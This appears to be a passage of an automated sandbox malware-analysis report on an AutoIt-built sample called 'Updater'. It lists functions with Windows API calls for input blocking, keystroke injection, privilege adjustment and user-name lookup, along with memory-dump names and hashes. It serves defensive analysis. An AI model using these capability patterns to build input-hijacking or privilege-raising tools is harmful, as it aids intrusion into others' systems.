Instruction Fuzzy Hash: 8511BE316142109FCB10DF29C884A16BBE0FF85324F15C6A8E4698F2A2CB34ED05CBA0

Function 00B94573 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00BA548F,?,?,00BA5FF9,?), ref: 00B945A2
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00BA548F,?,?,00BA5FF9,?), ref: 00B945B2

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 5cb3d991cf0512575c0d0c2febb9495e8b05965b8df251c0c4491a501f54757f
Instruction ID: aed31ce646e50bc82824c299cb6f08f78b3285633c512b3dd5257b8e62363768
Opcode Fuzzy Hash: 5cb3d991cf0512575c0d0c2febb9495e8b05965b8df251c0c4491a501f54757f
Instruction Fuzzy Hash: FEF0A7706042292BD72066A59C49FAB76AEEF85761F0102B6F508D3181D960980587F1

Function 00B8C078 Relevance: 3.0, APIs: 2, Instructions: 30keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00B8C0AF
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00B8C0C2

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 1ec8de36a37256bbc83f899d14a1122f25842d57f69ec85e7a65feb9f03e6036
Instruction ID: d5b5427bdba5940ab6a7d10ec9cd8e3ec63829d2ff15900a06bf6efffe39945d
Opcode Fuzzy Hash: 1ec8de36a37256bbc83f899d14a1122f25842d57f69ec85e7a65feb9f03e6036
Instruction Fuzzy Hash: 16F06D7180424DABDB159FA4C805BFE7FB4EF08315F00814AFD55962A2D7798611DFA4

Function 00B821C9 Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B82308), ref: 00B821DE
CloseHandle.KERNEL32(?,?,00B82308), ref: 00B821F3

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: bcd996c9752caac7d0094c9067ad7d6cd4f63e28666679e08d7035262442e448
Instruction ID: c2a454112fa06c4ad2b275e67ac5d0605b06e5ee0876ca73ea998abe604703eb
Opcode Fuzzy Hash: bcd996c9752caac7d0094c9067ad7d6cd4f63e28666679e08d7035262442e448
Instruction Fuzzy Hash: 06E04F72014600AFE7253B14FC0AE727BE9EB04320F24896DF6A581471EBB2AC90EB14

Function 00B56599 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,00B56594,00000000,?,00000008,?,?,00B5FDAF,00000000), ref: 00B567C6

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 1bb335a3ab7e54bafc2c84e169f5c398ede53d0e8fe12081e099c706970fdd82
Instruction ID: cd29202f8abe3eb4d5567a7482e6568900dd9d75fc9a1119ffb8b169587cf862
Opcode Fuzzy Hash: 1bb335a3ab7e54bafc2c84e169f5c398ede53d0e8fe12081e099c706970fdd82
Instruction Fuzzy Hash: E8B15B316106089FD719CF28C48ABA47BE0FF08369F6586D9EC99CF2A1C735E985CB40

Function 00B40CA4 Relevance: 1.6, APIs: 1, Instructions: 130COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B40CBD

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 85b069827f15066c8ceeaf3495d177332c1b89f68b7cf87201c9af10269661f2
Instruction ID: 5bb40120e2194851d7d82892285d37a2762b26c3b7adfdf22a1a7fd4932d4344
Opcode Fuzzy Hash: 85b069827f15066c8ceeaf3495d177332c1b89f68b7cf87201c9af10269661f2
Instruction Fuzzy Hash: 3C41C3B1D11205DFDB28DFA9D9C56AABBF4FB04310F288CAAC915EB250D770AE44DB50

Function 00B9F607 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00B9F622

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 9ce2807eaa31bc5cff81f0198d45e65a4b3e244040f2d377cdab10a6d271b9da
Instruction ID: fe2b635024900d81600bc367b32787b8949c0b88a664d12bc4095dc00719360a
Opcode Fuzzy Hash: 9ce2807eaa31bc5cff81f0198d45e65a4b3e244040f2d377cdab10a6d271b9da
Instruction Fuzzy Hash: 35E012352002156FD710AF59D444AAAF7DCEF58760F008066F949C7251DAB4E9408BA4

Function 00B659C7 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00B659D9

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 2554eb45a7964b6d0248f01c271d3d26dc768182598c5cdd2d9ec6afd7beda10
Instruction ID: 604b725bac61ef83e206f088d572f16b834e4d5b9316344aef7d0b1ee06db29c
Opcode Fuzzy Hash: 2554eb45a7964b6d0248f01c271d3d26dc768182598c5cdd2d9ec6afd7beda10
Instruction Fuzzy Hash: 61C04CF5811118ABCB50DBA0EDC8DDD77BCBB04304F100255F502A2100EBB895449B10

Function 00B40F9F Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020FAB,00B40A05), ref: 00B40FA4

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1eaaee67045fcd69a7e24af31a98572adee33085ca1c1156ba7cf7226729ce8d
Instruction ID: 6e789a74b4e9218cbd8e3efdca5125488cca6456eabc5f8e2a5a4bf4a8235b15
Opcode Fuzzy Hash: 1eaaee67045fcd69a7e24af31a98572adee33085ca1c1156ba7cf7226729ce8d
Instruction Fuzzy Hash:

Function 00B47746 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 00B478B6

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 263a3ceb04b01b1b513cacad4b34db7d2faa4ca095eb18e23c9e7ee211e415bb
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 56517AB06CC64457EF388929899DBBE23DADB52300F5809D9E482C7292CF05DF45F396

Function 00B2EE00 Relevance: .8, Instructions: 849COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 220724932319c208671cd3a685953bbc3cd7069c7fb4bc4cea7df2790ecd151d
Instruction ID: ba0a902cf51598995adcf2f3ba8825c73afd1927229878b9c883043015b47cfa
Opcode Fuzzy Hash: 220724932319c208671cd3a685953bbc3cd7069c7fb4bc4cea7df2790ecd151d
Instruction Fuzzy Hash: FF62B170A0061ADBDF14DF64D881ABEB7F5FF44300F1481B9E82A9B291EB75DA41CB51

Function 00B56C09 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61d0f60f60707de165724d11ea251a706897e1b0a04ef7a60d96a13002a0d236
Instruction ID: 838d27ea111b79e2dfb66c3177054ca5ba55eefa8849439523b1338613867c37
Opcode Fuzzy Hash: 61d0f60f60707de165724d11ea251a706897e1b0a04ef7a60d96a13002a0d236
Instruction Fuzzy Hash: 59323521E68F014DD7239634D86233AA688EFB73D5F55C367EC1AB6AA5EF29C5834100

Function 00B3F0DA Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 625542788dfb0d2492062d3fdba9398f39be5fcf719abd0ece1bf2b4998ccec7
Instruction ID: cb455477951612c01076f3835346084eae0443986babab557ebe4e18c5260f46
Opcode Fuzzy Hash: 625542788dfb0d2492062d3fdba9398f39be5fcf719abd0ece1bf2b4998ccec7
Instruction Fuzzy Hash: 7032D031A00247DBDF28CE68D4D467EB7E2EF45310F29C1FAD8AA9B691D634DD81CA05

Function 00B2CE20 Relevance: .6, Instructions: 623COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd746588b24babb4270363b984d71b07179ce561899f2a4724ddf3b7a59d4d36
Instruction ID: ab1d2fa8de9dc4a250a22be3b163ea9dab163f5139b34ab1038d746659defa58
Opcode Fuzzy Hash: bd746588b24babb4270363b984d71b07179ce561899f2a4724ddf3b7a59d4d36
Instruction Fuzzy Hash: 3742BC716083509FC724DF24D881B6AB7F1FF84304F1489ADF48A9B2A2DB75E945CB92

Function 00B429E3 Relevance: .5, Instructions: 473COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 323db9accf14f3090eec3d0a87b25f30b364fe91438709469afbe282fd986862
Instruction ID: 440657fb4098fabb350a27f2041e4b123325fa5c61981dc3a5cb4c9fd9bf32f2
Opcode Fuzzy Hash: 323db9accf14f3090eec3d0a87b25f30b364fe91438709469afbe282fd986862
Instruction Fuzzy Hash: 76E15E317011278BDF0CCA2E88B007E76E1EB9437179543ADAD67D73C4EA64DA24F6A0

Function 00B42F23 Relevance: .5, Instructions: 470COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5b3e5219c24e38db487436f5840cf4e1437969e14af223875bf10b042f87811
Instruction ID: feb56aa8d678c7903742b1d2b7be1510f51e3f65c53e693191c2b06852870016
Opcode Fuzzy Hash: b5b3e5219c24e38db487436f5840cf4e1437969e14af223875bf10b042f87811
Instruction Fuzzy Hash: 65F17E317011238BDF0C8A6E88B017E76E1EB9477175943ADAD67D73C4EA24DF24E6A0

Function 00B424CA Relevance: .5, Instructions: 457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28e35ac769e7317f25c8d2f7079bfb7ba7f6bb36bb2429e733617ce6d81fc8a1
Instruction ID: 53ac4240cc95f095f8a2c947aa664cafaa9cf66fb5a76be2c95e3acfec2f96c3
Opcode Fuzzy Hash: 28e35ac769e7317f25c8d2f7079bfb7ba7f6bb36bb2429e733617ce6d81fc8a1
Instruction Fuzzy Hash: 74E13D317012264BDF0CCA6D89B007E76E1EBA4371B5643ADA967D73C4EA24DE14F6A0

Function 00B92D81 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cbbe73ece808e9d5b9b9da20c40a852e7b712b22a389c2efd1644321bfcc0cb
Instruction ID: ebbb419f6bca847d89022c09d1b8a8b82ee60cfe6c6a10c9efd80298e2a5a52e
Opcode Fuzzy Hash: 7cbbe73ece808e9d5b9b9da20c40a852e7b712b22a389c2efd1644321bfcc0cb
Instruction Fuzzy Hash: 3421C6326205159BDB18CF79C8136BA73E5EB54310F158A6EE4A7C33D0DE35A904CB80

Function 00BA3622 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 487filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00BA3674
DeleteObject.GDI32(00000000), ref: 00BA3687
DestroyWindow.USER32 ref: 00BA3696
GetDesktopWindow.USER32 ref: 00BA36B1
GetWindowRect.USER32(00000000), ref: 00BA36B8
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00BA37E7
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00BA37F5
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA383C
GetClientRect.USER32(00000000,?), ref: 00BA3848
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00BA3884
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA38A6
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA38B9
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA38C4
GlobalLock.KERNEL32(00000000), ref: 00BA38CD
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA38DC
GlobalUnlock.KERNEL32(00000000), ref: 00BA38E5
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA38EC
GlobalFree.KERNEL32(00000000), ref: 00BA38F7
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA3909
OleLoadPicture.OLEAUT32(?,00000000,00000000,00BC0BEC,00000000), ref: 00BA391F
GlobalFree.KERNEL32(00000000), ref: 00BA392F
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00BA3955
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00BA3974
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA3996
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA3B83

Strings

AutoIt v3, xrefs: 00BA3836
static, xrefs: 00BA387E, 00BA39D5
DISPLAY, xrefs: 00BA39E6
, xrefs: 00BA3B09

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: cd2f31cf20d2e122539a34cafd74f22700f3027eb31b6c82887463c3eaacf171
Instruction ID: 538a7371a540e2061358bce4d6085fabd9f5e1c587e5570a32edbe9eaf3b41ce
Opcode Fuzzy Hash: cd2f31cf20d2e122539a34cafd74f22700f3027eb31b6c82887463c3eaacf171
Instruction Fuzzy Hash: 8D027F71500214EFDB14DF64DC89EAE7BF9EB49710F148298F915AB2A0DB78EE01CB64

Function 00BB0198 Relevance: 58.2, APIs: 10, Strings: 23, Instructions: 479windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00BB0288
_wcslen.LIBCMT ref: 00BB029D
IsWindowVisible.USER32(?), ref: 00BB02DF
_wcslen.LIBCMT ref: 00BB02F5
IsWindowEnabled.USER32(?), ref: 00BB0331
_wcslen.LIBCMT ref: 00BB0347
_wcslen.LIBCMT ref: 00BB0394

Part of subcall function 00B4014F: _wcslen.LIBCMT ref: 00B4015A

Part of subcall function 00B82E91: SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B82F15
Part of subcall function 00B82E91: SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B82F28
Part of subcall function 00B82E91: SendMessageW.USER32(?,00000189,?,00000000), ref: 00B82F58

Part of subcall function 00B82A02: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B82A0D

Strings

SETCURRENTSELECTION, xrefs: 00BB0541
TABLEFT, xrefs: 00BB0342, 00BB0359
GETCURRENTSELECTION, xrefs: 00BB056E
SENDCOMMANDID, xrefs: 00BB0787
TABRIGHT, xrefs: 00BB038F, 00BB03A4
UNCHECK, xrefs: 00BB0621
ISENABLED, xrefs: 00BB02F0, 00BB0307
CURRENTTAB, xrefs: 00BB03DB
CHECK, xrefs: 00BB0601
DELSTRING, xrefs: 00BB04D4
GETCURRENTLINE, xrefs: 00BB0693
FINDSTRING, xrefs: 00BB0501
EDITPASTE, xrefs: 00BB0705
ADDSTRING, xrefs: 00BB04A1
GETCURRENTCOL, xrefs: 00BB06CE
GETLINE, xrefs: 00BB0744
SHOWDROPDOWN, xrefs: 00BB042E
SELECTSTRING, xrefs: 00BB0599
